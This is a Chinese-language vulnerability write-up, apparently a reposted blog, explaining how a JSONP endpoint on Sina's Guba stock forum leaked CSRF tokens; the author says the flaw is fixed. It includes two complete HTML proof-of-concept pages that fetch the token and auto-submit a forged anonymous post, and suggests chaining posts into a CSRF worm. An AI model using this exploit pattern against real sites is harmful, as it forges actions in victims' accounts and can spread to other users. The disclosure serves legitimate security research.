分享一个jsonp劫持造成的新浪某社区CSRF蠕虫
最近jsonp很火,实话说已经是被玩烂了的,只是一直没有受到大家的重视。正好在上个月,我挖过一个由于jsonp造成的新浪某社区CSRF,当时是为了准备一篇文章,之后这篇文章也会拿出来分享。
因为新浪已经修复了问题,所以我先把这个漏洞分享出来。以下是当时写的部分文章。
0x01 引子
听说新浪五月送衣服,我其实也没太多空去挖洞。本来想交一个两年前挖的CSRF刷粉,结果拿出来一看那洞早没了,目标站都换了。
详细说,就是我那个洞被302跳转到新浪股吧(http://guba.sina.com.cn/)去了。
最近股市很火啊,多少人在股市里发家致富。于是我简单开着burpsuite在股吧里转了一圈,发现了一处有意思的CSRF。
新浪微博玩的多的同学都知道新浪针对CSRF漏洞的防御策略是检查Referer,但股吧发帖这里却不是,少见地检查是token。
如图,抓一个正常发帖的POST数据包,我们可以看到其中含有_csrf_token这个字段。经过简单FUZZ发现,这个请求是不检查Referer的,只要_csrf_token正确即可发帖。
那么,如何获取_csrf_token,我有如下思路:
- 查看本站是否有泄漏token的jsonp
- 通过flash窃取源码
为什么我会有以上思路?首先,获取token一定是一个跨域过程,跨域的话通常就是CORS、postMessage和jsonp,这里CORS和postMessage都是不存在的,那么我就去找jsonp。
flash的思路应该已经流传已久了,去年这个时候/fd就已经在drops里说到了这个:http://drops.wooyun.org/tips/2031
但法2有一个很重要的条件是我们需要找到一个能控制输出内容的点,如上传、jsonp等,但实际上这样的位置并不好找,利用起来不如第一种方法简单。
0x02 jsonp出卖了你的_csrf_token
那么,跟着自己的思路来测试。
我先将_csrf_token修改成随意一个字符串,发送发现返回这样一个结果:
返回的数据包是一个json格式的字符串,其中包含了一个_csrf_token。多次发送这个数据包,我发现这个token每次都会变化。
那么我大概可以猜到,股吧的token是一个动态生成的,应该是储存在session中,每次检查完成后会生成一个新的。
但这里是json格式的返回值,而非jsonp。
于是我在GET参数中加入&callback=hehehe
试试:
很明显,返回的格式变了。虽然不是jsonp,但却是一个<script>了。
为什么加上callback=hehehe就变了?这应该是一个开发习惯,通常开发设计api的时候都会有json和jsonp两种格式,而通常取jsonp的函数名的变量名就是callback。
这里是<script>
还是没法跨域呀,parent.hehehe执行父框架中的hehehe函数,但父框架(10.211.55.3)和guba.sina.com.cn还是不同域,chrome下会爆出这个错误:
继续尝试,将HTTP方法改成GET:
惊喜,方法一变就得到jsonp了。
那么我用这个jsonp里的_csrf_token试试能不能成功发帖:
悲剧的是,不行……
那么我有两个猜想
- _csrf_token和HTTP方法有关,GET方法只能痛GET方法获取的token,POST用POST的token
- _csrf_token和“吧id”有关,不同id对应不同token。原因是返回错误的原因里多次提到“缺少参数:吧id或吧名”。
第一个猜想被我的程序员直觉否定了,我没见过有这样写程序的。
我尝试第二个猜想,在GET数据包的URL中加上&bid=9947,再次发送数据包:
仍然是jsonp格式,我将这个token再写入post数据包中发送:
成功了!
一个jsonp将_csrf_token彻底出卖了。
0x03 构造POC发表任意帖子
那么我开始编写POC来完成刚才手工完成的步骤。思路如下:
- jsonp获得token
- 构造POST表单提交
先构造一个获取token的简单代码:
<html>
<head>
<title>test</title>
<meta charset="utf-8">
<script type="text/javascript">
function hehehe(obj){
console.log(obj);
alert(obj["result"]["data"]["_csrf_token"]);
}
</script>
<script type="text/javascript" src=“http://guba.sina.com.cn/api/?s=Thread&a=safe_post&callback=hehehe&bid=9947"></script>
</head>
</html>
效果如图:
已经获取到token了。
这时候,将token嵌入表单中提交即可:
<html>
<head>
<title>test</title>
<meta charset="utf-8">
</head>
<body>
<form action="http://guba.sina.com.cn/api/?s=Thread&a=safe_post" method="POST" id="csrfsend">
<input type="hidden" name="bid" value="9947">
<input type="hidden" name="tid" value="">
<input type="hidden" name="content" value="这是测试结果">
<input type="hidden" name="title" value="这是测试标题">
<input type="hidden" id="token" name="_csrf_token" value="">
<input type="hidden" name="anonymous" value="1">
</form>
<script type="text/javascript">
function hehehe(obj){
console.log(obj);
var csrf_token = obj["result"]["data"]["_csrf_token"];
document.getElementById("token").value = csrf_token;
document.getElementById("csrfsend").submit();
}
</script>
<script type="text/javascript" src="http://guba.sina.com.cn/api/?s=Thread&a=safe_post&callback=hehehe&bid=9947"></script>
</body>
</html>
以上代码,保存为sinacsrf.html,任意用户访问后即可触发,在板块9947发表一篇新帖子:
如图可见已发表:
这就是一个很典型的CSRF漏洞,通过jsonp窃取token来绕过后端的检查。
发表的帖子里还能再贴入链接,引诱其他用户点击,点击访问再次发帖,造成一个CSRF蠕虫。
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Android开发实现popupWindow弹出窗口自定义布局与位置控制方法
- Android编程实现使用handler在子线程中更新UI示例
- Android编程实现图片放大缩小功能ZoomControls控件用法实例
- 详解Android MacAddress 适配心得
- Android编程使用GestureDetector实现简单手势监听与处理的方法
- 【MySQL】通过SQL_Thread快速恢复binlog
- 渗透系列之flask框架开启debug模式漏洞分析
- Android之ImageSwitcher的实例详解
- Android中HTTP请求中文乱码解决办法
- Android编程之播放器MediaPlayer实现均衡器效果示例
- Android studio点击跳转WebView详解
- Android webveiw 出现栈错误解决办法
- Android开发之实现手势滑动的功能
- Android编程实现带有单选按钮和复选按钮的dialog功能示例
- Android中Retrofit 2.0直接使用JSON进行数据交互